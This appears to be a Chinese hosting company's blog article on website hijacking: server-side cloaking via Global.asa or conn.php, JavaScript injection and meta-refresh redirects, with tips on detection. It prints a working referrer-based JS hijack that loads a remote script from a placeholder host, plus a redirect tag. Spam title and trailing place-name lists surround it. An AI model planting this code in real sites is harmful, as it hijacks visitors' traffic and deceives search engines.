成人午夜视频全免费观看高清-秋霞福利视频一区二区三区-国产精品久久久久电影小说-亚洲不卡区三一区三区一区

怎么通過網(wǎng)站監(jiān)控解決劫持問題-創(chuàng)新互聯(lián)

網(wǎng)站劫持是目前黑產(chǎn)最喜歡的一種網(wǎng)頁引流方式,此手法往往通過政府、教育機構(gòu)網(wǎng)站(權(quán)重高),修改網(wǎng)站源代碼、放寄生蟲程序、設(shè)置二級目錄反向代理等實現(xiàn)。網(wǎng)頁劫持可以分為服務(wù)端劫持、客戶端劫持、快照劫持、搜索劫持等等;表現(xiàn)形式可以是劫持跳轉(zhuǎn),也可以是劫持呈現(xiàn)的網(wǎng)頁內(nèi)容,目前被廣泛應(yīng)用于游戲、等暴利行業(yè)。
 iis7網(wǎng)站監(jiān)控檢測
測網(wǎng)站是否被劫持、域名是否被墻、DNS污染檢測、網(wǎng)站打開速度檢測等信息。
 服務(wù)端劫持也稱為全局劫持,手法為修改網(wǎng)站動態(tài)語言文本,判斷訪問來源控制返回內(nèi)容,從來達到網(wǎng)站劫持的目的。
 asp/aspx/php劫持
 Global.asa、Global.asax、conn.asp、conn.php等文件比較特殊,作用是在每次執(zhí)行一個動態(tài)腳本的時候,都會先加載該腳本, 然后再執(zhí)行目標腳本。所以只要在 Global.asa 中寫判斷用戶系統(tǒng)信息的代碼(訪問來源等),如果是蜘蛛訪問則返回關(guān)鍵詞網(wǎng)頁(想要推廣的網(wǎng)站),如果是用戶訪問,則返回正常頁面。
 客戶端劫持
 客戶端劫持的手法也很多,但主要就是2種:js劫持、Header劫持。
 js劫持
 js劫持目的:通過向目標網(wǎng)頁植入惡意js代碼,控制網(wǎng)站跳轉(zhuǎn)、隱藏頁面內(nèi)容、窗口劫持等。
 js植入手法:可以通過***服務(wù)器,直接寫入源代碼中;也可以寫在數(shù)據(jù)庫中,因為有些頁面會呈現(xiàn)數(shù)據(jù)庫內(nèi)容。
 js劫持案例
 效果:通過搜索引擎搜索點擊頁面(執(zhí)行一段js)跳轉(zhuǎn)到×××頁面;直接輸入網(wǎng)址訪問網(wǎng)頁,跳轉(zhuǎn)到404頁面。
 代碼:
 today=new Date();
 today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
 var regexp=/.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(.[a-z0-9-]+){1,2}\//ig;
 var where =document.referer;
 if(regexp.test(where)){
 document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>;');
 }
 else
 {
 window.location.href="../../404.htm";
 }
 分析:通過referer判斷來路,如果referer來路為空就是跳轉(zhuǎn)到404頁面,如果是搜索引擎來的referer里面也會有顯示,然后在寫代碼控制跳轉(zhuǎn)。如果只是控制實現(xiàn)顯示不同的內(nèi)容,可以修改php、asp代碼;如果需要劫持搜索引擎搜索框,可以寫JS代碼來做瀏覽器本地跳轉(zhuǎn)。當(dāng)然js功能可以無限擴展,比如可以控制一個ip一天內(nèi)第一次訪問正常,其余訪問跳轉(zhuǎn)等等。
 header劫持
 在源代碼中寫入以下代碼:
 1
 <meta http-equiv=“refresh“ content=“10; url=http://thief.one“>;
 利用的就是Meta Refresh Tag(自動轉(zhuǎn)向),將流量引走。
 手法對比
 客戶端劫持與服務(wù)端區(qū)別
 客戶端劫持:每次訪問網(wǎng)頁從服務(wù)端獲取到的網(wǎng)頁代碼都是相同的,只是控制了網(wǎng)頁代碼在瀏覽器中呈現(xiàn)的效果(比如是否進行跳轉(zhuǎn)等)。
 服務(wù)端劫持:改變了每次訪問網(wǎng)頁從服務(wù)端獲取到的網(wǎng)頁代碼。
 客戶端劫持與服務(wù)端判斷方法
 客戶端劫持的判斷方法:只需觀察瀏覽器呈現(xiàn)的網(wǎng)頁前端代碼,查看是否引用了不當(dāng)?shù)膉s,或者其它敏感內(nèi)容。
 服務(wù)端劫持的判斷方法:可以通過觀察網(wǎng)站后端代碼,或者通過改變ip,包頭等方式,觀察放回源碼是否不同。

讓客戶滿意是我們工作的目標,不斷超越客戶的期望值來自于我們對這個行業(yè)的熱愛。我們立志把好的技術(shù)通過有效、簡單的方式提供給客戶,將通過不懈努力成為客戶在信息化領(lǐng)域值得信任、有價值的長期合作伙伴,公司提供的服務(wù)項目有:域名申請、雅安服務(wù)器托管、營銷軟件、網(wǎng)站建設(shè)、涇川網(wǎng)站維護、網(wǎng)站推廣。

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機、免備案服務(wù)器”等云主機租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場景需求。

本文名稱:怎么通過網(wǎng)站監(jiān)控解決劫持問題-創(chuàng)新互聯(lián)
本文路徑:http://jinyejixie.com/article36/ddshsg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)頁設(shè)計公司、網(wǎng)站收錄、網(wǎng)站營銷、搜索引擎優(yōu)化網(wǎng)站維護、服務(wù)器托管

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)
永新县| 互助| 阆中市| 宜城市| 句容市| 光山县| 德江县| 昌都县| 施秉县| 安陆市| 庄河市| 云浮市| 南康市| 沽源县| 衡东县| 太仆寺旗| 宣武区| 广安市| 孙吴县| 大竹县| 永和县| 洛阳市| 保山市| 新竹县| 房山区| 龙江县| 连江县| 永新县| 东海县| 吉安县| 阜平县| 杭锦旗| 张掖市| 遵义市| 呼玛县| 甘南县| 八宿县| 阳西县| 黎城县| 旬邑县| 定陶县|